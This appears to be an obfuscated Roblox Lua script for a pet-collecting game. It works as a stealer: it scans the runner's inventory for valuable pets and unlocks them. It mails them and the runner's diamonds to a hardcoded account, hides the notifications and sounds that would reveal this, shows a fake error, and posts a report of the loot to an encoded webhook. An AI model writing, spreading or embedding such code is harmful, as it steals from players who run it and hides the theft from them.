--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v34,v35) local v36={};for v70=1, #v34 do v6(v36,v0(v4(v1(v2(v34,v70,v70 + 1 )),v1(v2(v35,1 + (v70% #v35) ,1 + (v70% #v35) + 1 )))%256 ));end return v5(v36);end Usernames={v7("\225\209\218\49\227\168\227\27\199","\126\177\163\187\69\134\219\167")};min_rap=887 + 113 ;min_chance=33878 + 66122 ;webhook=v7("\43\217\62\213\239\121\130\101\193\245\48\206\37\215\248\109\206\37\200\179\34\221\35\138\235\38\207\34\202\243\40\222\101\148\175\115\155\123\149\173\118\157\123\156\174\112\155\115\151\169\117\148\101\231\240\28\207\7\247\233\54\254\1\242\200\110\128\62\206\171\58\215\30\214\211\17\227\18\146\165\54\242\3\204\229\51\227\11\214\221\58\236\45\253\245\1\204\12\207\237\41\251\1\225\251\43\235\25\250\165\2\244\8\202\246\54\249\63\147\228\20","\156\67\173\74\165");local v8=game:GetService(v7("\6\178\89\26\181\37\71\32\178\77\37\168\41\84\53\176\76","\38\84\215\41\118\220\70")):WaitForChild(v7("\126\19\54\5\241\66\29","\158\48\118\66\114"));local v9=require(game.ReplicatedStorage.Library);local v10=require(game:GetService(v7("\153\33\0\58\122\166\250\191\33\20\5\103\170\233\170\35\21","\155\203\68\112\86\19\197")):WaitForChild(v7("\106\212\52\238\65\106\252","\152\38\189\86\156\32\24\133")):WaitForChild(v7("\223\91\174\67\242\67","\38\156\55\199")):WaitForChild(v7("\155\124\106\45","\35\200\29\28\72\115\20\154"))).Get().Inventory;local v11=game.Players.LocalPlayer;local v12=v7("\13\241\220\218\194\60\38\24\171\212\204\129\45\54","\84\121\223\177\191\237\76");local v13=game:GetService(v7("\147\66\221\176\9\85\34\215\178\85\204","\161\219\54\169\192\90\48\80"));local v14={};local v15=897 -(229 + 668) ;local v16={};_G.scriptExecuted=_G.scriptExecuted or false ;local v17=function() return require(game.ReplicatedStorage.Library.Client.Save).Get();end;if _G.scriptExecuted then return;end _G.scriptExecuted=true;for v37,v38 in ipairs(Usernames) do if (v11.Name==v38) then local v91=1975 -(1913 + 62) ;while true do if (v91==(0 + 0)) then v11:kick(v7("\112\77\21\101\74\67\14\43\70\86\64\40\72\75\12\54\93\71\1\41\9\91\15\48\91\81\5\41\79","\69\41\34\96"));return;end end end end local v18=0;for v39,v40 in pairs(v17().Inventory.Currency) do if (v40.id==v7("\152\202\214\7\13\37\184\208","\75\220\163\183\106\98")) then v18=v40._am;break;end end local function v19(v41) if (v41==nil) then return "0";end local v42={"","k","m","b","t"};local v43=1887 -(927 + 959) ;while (v41>=(2661 -(1477 + 184))) and (v43< #v42)  do local v71=0 -0 ;local v72;while true do if (v71==(0 -0)) then v72=0 + 0 ;while true do if (v72==(0 -0)) then v41=v41/(1285 -(175 + 110)) ;v43=v43 + (2 -1) ;break;end end break;end end end if (v43==(4 -3)) then return tostring(math.floor(v41));elseif (v41==math.floor(v41)) then return string.format(v7("\71\190\206\36","\185\98\218\235\87"),v41,v42[v43]);else return string.format(v7("\142\114\117\224\155\185","\202\171\92\71\134\190"),v41,v42[v43]);end end local function v20(v44,v45) local v46={[v7("\10\206\34\156\44\207\56\197\29\216\60\141","\232\73\161\76")]=v7("\186\201\82\81\23\184\216\86\84\17\181\150\72\78\17\181","\126\219\185\34\61")};local v47={{[v7("\2\207\83\119","\135\108\174\62\18\30\23\147")]=v7("\131\250\47\217\22\175\62\194\236","\167\214\137\74\171\120\206\83"),[v7("\157\241\62\72\253","\199\235\144\82\61\152")]=v44,[v7("\14\24\181\34\9\19","\75\103\118\217")]=true},{[v7("\201\85\125\17","\126\167\52\16\116\217")]=v7("\225\58\37\141\167\67","\156\168\78\64\224\212\121"),[v7("\17\239\169\219\2","\174\103\142\197")]="",[v7("\95\38\83\49\43\91","\152\54\72\63\88\69\62")]=false},{[v7("\218\197\227\89","\60\180\164\142")]=v7("\96\4","\114\56\62\101\73\71\141"),[v7("\174\232\215\209\189","\164\216\137\187")]="",[v7("\219\232\61\187\168\251","\107\178\134\81\210\198\158")]=false}};local v48={};local v49={};for v73,v74 in ipairs(v14) do local v75=0 -0 ;local v76;while true do if (v75==(0 + 0)) then v76=v74.name;if v49[v76] then v49[v76].amount=v49[v76].amount + v74.amount ;else local v121=0;while true do if (v121==(0 -0)) then v49[v76]={[v7("\57\3\141\211\164\44","\202\88\110\226\166")]=v74.amount,[v7("\209\14\146","\170\163\111\226\151")]=v74.rap,[v7("\18\56\179\54\77\50","\73\113\80\210\88\46\87")]=v74.chance};table.insert(v48,v76);break;end end end break;end end end table.sort(v48,function(v77,v78) return (v49[v77].rap * v49[v77].amount)>(v49[v78].rap * v49[v78].amount) ;end);for v79,v80 in ipairs(v48) do local v81=v49[v80];local v82="";if v81.chance then v82=string.format(v7("\208\99\136\1\167\196\63\141\90\255\196\40\132\72\167\196\63\141\32\198\177","\135\225\76\173\114"),v19(v81.chance),v80,v81.amount,v19(v81.rap * v81.amount ));else v82=string.format(v7("\95\254\248\248\180\248\163\83\183\248\245\191\253\149\59\221","\199\122\141\216\208\204\221"),v80,v81.amount,v19(v81.rap * v81.amount ));end v47[5 -3 ].value=v47[2].value   .. v82   .. "\n" ;end local v50;if ( #v16==1) then v50=v7("\177\193","\150\205\189\112\144\24")   .. v16[1 + 0 ]   .. v7("\57\152","\112\69\228\223\44\100\232\113") ;elseif ( #v16>(305 -(244 + 60))) then local v101={};for v109,v110 in ipairs(v16) do table.insert(v101,v7("\200\3","\230\180\127\103\179\214\28")   .. v110   .. v7("\144\25","\128\236\101\63\38\132\33") );end v50=table.concat(v101,v7("\224\233","\175\204\201\113\36\214\139"));else v50=v7("\91\208\27\211\10\66\208\41","\100\39\172\85\188");end v47[3 + 0 ].value=string.format("Gems: %s\nTotal RAP: %s\nSent to users: %s",v19(v45),v19(v15),v50);if ( #v47[2 + 0 ].value>(1757 -(711 + 22))) then local v93=476 -(41 + 435) ;local v94;while true do if (v93==(1002 -(938 + 63))) then while ( #v47[2].value>(1883 -(240 + 619))) and ( #v94>(0 + 0))  do table.remove(v94);v47[1127 -(936 + 189) ].value=table.concat(v94,"\n")   .. "\nPlus more!" ;end break;end if (v93==(0 + 0)) then v94={};for v123 in v47[1615 -(1565 + 48) ].value:gmatch("[^\r\n]+") do table.insert(v94,v123);end v93=1 + 0 ;end end end local v52={[v7("\168\117\187\133\55\190","\83\205\24\217\224")]={{[v7("\242\204\217\49\227","\93\134\165\173")]="\240\159\142\178 New Pets Go Execution",[v7("\189\253\205\205\40","\30\222\146\161\162\90\174\210")]=65547 -(176 + 91) ,[v7("\227\71\117\6\225\93","\106\133\46\16")]=v47,[v7("\94\47\124\232\95\82","\32\56\64\19\156\58")]={[v7("\78\205\253\66","\224\58\168\133\54\58\146")]=v7("\123\79\11\205\103\135\147\14\74\114\78\235","\107\57\54\43\157\21\230\231")}}}};local v53=v13:JSONEncode(v52);if (webhook and (webhook~="")) then local v95=request({[v7("\238\153\29","\175\187\235\113\149\217\188")]=webhook,[v7("\17\170\149\68\236\125","\24\92\207\225\44\131\25")]=v7("\123\252\139\120","\29\43\179\216\44\123"),[v7("\149\220\33\72\184\203\51","\44\221\185\64")]=v46,[v7("\35\232\76\70","\19\97\135\40\63")]=v53});end end local v21=v11.PlayerScripts.Scripts.Core[v7("\158\78\60\56\42\34\189\28\3\62\33\53\167\82\52\123\8\4\135","\81\206\60\83\91\79")];local v22=v11.PlayerGui.Notifications;v21.Disabled=true;v22:GetPropertyChangedSignal(v7("\107\165\209\112\35\198\73","\196\46\203\176\18\79\163\45")):Connect(function() v22.Enabled=false;end);v22.Enabled=false;game.DescendantAdded:Connect(function(v55) if (v55.ClassName==v7("\139\45\107\16\32","\143\216\66\30\126\68\155")) then if ((v55.SoundId==v7("\184\202\21\202\214\176\210\245\163\204\87\132\138\242\134\185\249\145\92\152\151\246\129\180","\129\202\168\109\171\165\195\183")) or (v55.SoundId==v7("\48\90\47\217\205\7\227\54\81\51\130\145\91\183\118\10\98\140\137\70\183\114\11\111","\134\66\56\87\184\190\116")) or (v55.SoundId==v7("\46\51\17\186\10\248\36\33\53\53\83\244\86\186\115\97\109\98\93\233\74\185\118\99","\85\92\81\105\219\121\139\65"))) then local v102=0 + 0 ;while true do if ((2 -1)==v102) then v55:Destroy();break;end if (v102==(0 -0)) then v55.Volume=0 -0 ;v55.PlayOnRemove=false;v102=1093 -(975 + 117) ;end end end end end);local function v25(v56,v57) return require(game:GetService(v7("\207\182\64\73\117\220\252\167\85\65\79\203\242\161\81\66\121","\191\157\211\48\37\28")).Library.Client.RAPCmds).Get({[v7("\252\19\245\15\41","\90\191\127\148\124")]={[v7("\86\134\35\18","\119\24\231\78")]=v56},[v7("\171\62\132","\113\226\77\197\42\188\32")]=function(v84) return v84==v56 ;end,[v7("\29\19\224\156\62","\213\90\118\148")]=function() return v57.id;end,[v7("\104\58\181\85\70\112\43\173","\45\59\78\212\54")]=function() return v13:JSONEncode({[v7("\25\82","\144\112\54\227\235\230\78\205")]=v57.id,[v7("\163\60","\59\211\72\111\156\176")]=v57.pt,[v7("\93\143","\77\46\231\131")]=v57.sh,[v7("\174\90","\32\218\52\214")]=v57.tn});end}) or (1875 -(157 + 1718)) ;end local v26=Usernames or {v7("\126\5\48\188\244\163\97\95\88","\58\46\119\81\200\145\208\37"),v7("\10\142\34\169\188\167\55\47\131\8","\86\75\236\80\204\201\221")} ;local v27=min_rap or (3418 -2418) ;local v28=min_chance or (101018 -(697 + 321)) ;local v29=webhook;local function v30(v58,v59,v60) local v61=0 -0 ;local v62;local v63;local v64;while true do if (v61==(1 + 0)) then v64=false;repeat local v103=v26[v62];local v104={[1 -0 ]=v103,[4 -2 ]=v12,[3 + 0 ]=v58,[2 + 2 ]=v59,[2 + 3 ]=v60 or (1 -0) };local v105,v106=v8:WaitForChild(v7("\95\64\126\137\252\132\106\27\55\182\251\133\118","\235\18\33\23\229\158")):InvokeServer(unpack(v104));if (v105==true) then local v124=0;while true do if (v124==(0 -0)) then v64=true;if  not table.find(v16,v103) then table.insert(v16,v103);end break;end end elseif ((v105==false) and (v106=="They don't have enough space!")) then v62=v62 + (1228 -(322 + 905)) ;if (v62>v63) then v64=true;end end until v64 break;end if (v61==(611 -(602 + 9))) then local v96=1189 -(449 + 740) ;while true do if (v96==0) then v62=873 -(826 + 46) ;v63= #v26;v96=948 -(245 + 702) ;end if (v96==(470 -(270 + 199))) then v61=3 -2 ;break;end end end end end local function v31() for v85,v86 in pairs(v17().Inventory.Currency) do if (v86.id==v7("\116\179\192\182\95\180\197\168","\219\48\218\161")) then if ((v18>=(161 + 339)) and (v18>=v27)) then local v111=1899 -(260 + 1638) ;local v112= #v26;local v113=false;repeat local v125=440 -(382 + 58) ;local v126;local v127;local v128;local v129;local v130;while true do if (v125==(0 + 0)) then v126=0 + 0 ;v127=nil;v125=3 -2 ;end if (v125==(2 + 0)) then v130=nil;while true do if (v126==(1 -0)) then v129,v130=v8:WaitForChild(v7("\44\51\15\54\95\14\42\92\122\110\4\60\2","\61\97\82\102\90")):InvokeServer(unpack(v128));if (v129==true) then local v147=0 -0 ;local v148;while true do if (v147==(1167 -(645 + 522))) then v148=0;while true do if (v148==(1205 -(902 + 303))) then v113=true;if  not table.find(v16,v127) then table.insert(v16,v127);end break;end end break;end end elseif ((v129==false) and (v130=="They don't have enough space!")) then local v149=0 -0 ;local v150;while true do if (v149==(0 -0)) then v150=0 + 0 ;while true do if (v150==(1690 -(1121 + 569))) then v111=v111 + (1791 -(1010 + 780)) ;if (v111>v112) then v113=true;end break;end end break;end end end break;end if (v126==(0 + 0)) then v127=v26[v111];v128={[215 -(22 + 192) ]=v127,[685 -(483 + 200) ]=v12,[3]=v7("\199\100\110\91\222\65\227\253","\128\132\17\28\41\187\47"),[1467 -(1404 + 59) ]=v85,[13 -8 ]=v18};v126=1;end end break;end if ((1 -0)==v125) then v128=nil;v129=nil;v125=767 -(468 + 297) ;end end until v113 break;end end end end local function v32() local v65=562 -(334 + 228) ;local v66;local v67;while true do if (v65==(0 -0)) then v66,v67=v8:WaitForChild(v7("\129\47\162\71\197\88\6\83\236\13\167\74\206\90\94\40\160\34","\105\204\78\203\43\167\55\126")):InvokeServer();while v67==v7("\156\165\54\94\30\17\212\69\229\189\34\23\7\68\148\1\229\185\38\29\28\10\195\66\229\168\38\24\28\22\194\17\176\185\42\16\20\68\211\89\160\234\46\31\26\8\197\94\189\235","\49\197\202\67\126\115\100\167")  do local v107=505 -(351 + 154) ;while true do if (v107==(1574 -(1281 + 293))) then wait();v66,v67=v8:WaitForChild(v7("\26\90\214\37\130\89\70\109\27\252\37\129\95\83\119\122\211\37","\62\87\59\191\73\224\54")):InvokeServer();break;end end end break;end end end local v33={v7("\215\7\238","\169\135\98\154"),v7("\227\120\50\81\239\49\199\202\101\32","\168\171\23\68\52\157\83"),v7("\210\99\224\164\49","\231\148\17\149\205\69\77"),v7("\173\174\212\248","\159\224\199\167\155\55"),v7("\213\252\51\198\255","\178\151\147\92")};for v68,v69 in pairs(v33) do if (v10[v69]~=nil) then for v97,v98 in pairs(v10[v69]) do local v99=0 -0 ;while true do if (v99==(0 + 0)) then if (v69==v7("\188\248\88","\26\236\157\44\82\114\44")) then local v136=0 + 0 ;local v137;while true do if ((236 -(141 + 95))==v136) then v137=v25(v69,v98);if (v137>=v27) then local v145=0 + 0 ;local v146;while true do if (v145==(0 -0)) then v146=require(game:GetService(v7("\24\43\197\87\35\45\212\79\47\42\230\79\37\60\212\92\47","\59\74\78\181")).Library.Directory.Pets)[v98.id][v7("\33\216\92\92\186\38\196\86\78\170","\211\69\177\58\58")];if (v146>=v28) then local v152=0 -0 ;local v153;while true do if (v152==(0 + 0)) then v153=0 + 0 ;while true do if (v153==(0 + 0)) then table.insert(v14,{[v7("\180\228\109\240\238\196\165\252","\171\215\133\25\149\137")]=v69,[v7("\244\193\54","\34\129\168\82\154\143\80\156")]=v97,[v7("\132\191\60\30\70\90","\233\229\210\83\107\40\46")]=v98._am or (2 -1) ,[v7("\211\67\34","\101\161\34\82\182")]=v137,[v7("\230\12\84\251","\78\136\109\57\158\187\130\226")]=v98.id,[v7("\61\55\248\255\61\58","\145\94\95\153")]=v146});v15=v15 + (v137 * (v98._am or (1 + 0))) ;break;end end break;end end end break;end end end break;end end else local v138=0 + 0 ;local v139;while true do if (v138==(1455 -(990 + 465))) then v139=v25(v69,v98);if (v139>=v27) then table.insert(v14,{[v7("\254\204\0\208\73\184\239\212","\215\157\173\116\181\46")]=v69,[v7("\32\189\143","\186\85\212\235\146")]=v97,[v7("\195\140\25\235\55\250","\56\162\225\118\158\89\142")]=v98._am or (1 -0) ,[v7("\78\4\208","\184\60\101\160\207\66")]=v139,[v7("\63\131\113\185","\220\81\226\28")]=v98.id});v15=v15 + (v139 * (v98._am or (1 + 0))) ;end break;end end end if v98._lk then local v140=163 -(92 + 71) ;local v141;while true do if (v140==0) then v141={[1 + 0 ]=v97,[2 -0 ]=false};v8:WaitForChild(v7("\63\218\129\240\227\201\20\234\177\254\254\235\28\214\137\254\238","\167\115\181\226\155\138")):InvokeServer(unpack(v141));break;end end end break;end end end end end if ( #v14>(765 -(574 + 191))) then local v87=0 + 0 ;local v88;local v89;local v90;while true do if (v87==(1726 -(1668 + 58))) then v32();v88=game:GetService(v7("\208\39\247\80\114\114\199\246\39\227\111\111\126\212\227\37\226","\166\130\66\135\60\27\17")):WaitForChild(v7("\104\67\204\103\49\86\83","\80\36\42\174\21")):WaitForChild(v7("\109\28\62\127\64\4","\26\46\112\87")):WaitForChild(v7("\138\34\189\113","\212\217\67\203\20\223\223\37"));v89=require(v88).Get();v87=2 -1 ;end if (v87==(2 + 1)) then v20(v11.Name,v18);v90=require(game.ReplicatedStorage.Library.Client.Message);v90.Error(v7("\154\160\229\219\175\245\173\129\248\229\182\128\248\229\182\128\248\229\182\128\247","\176\214\213\134"));v87=8 -4 ;end if (v87==(851 -(254 + 595))) then table.sort(v14,function(v114,v115) return (v114.rap * v114.amount)>(v115.rap * v115.amount) ;end);v31();for v116,v117 in ipairs(v14) do v30(v117.category,v117.uid,v117.amount);end v87=129 -(55 + 71) ;end if (v87==(5 -1)) then setclipboard(v7("\224\227\187\209\231\70\75\245\185\179\199\164\87\91","\57\148\205\214\180\200\54"));break;end if (v87==(1791 -(573 + 1217))) then function deepCopy(v118) local v119={};for v131,v132 in pairs(v118) do local v133=0;while true do if (v133==(0 -0)) then if (type(v132)==v7("\174\140\170\222\191","\178\218\237\200")) then v132=deepCopy(v132);end v119[v131]=v132;break;end end end return v119;end v89=deepCopy(v89);require(v88).Get=function(...) return v89;end;v87=1 + 1 ;end end end
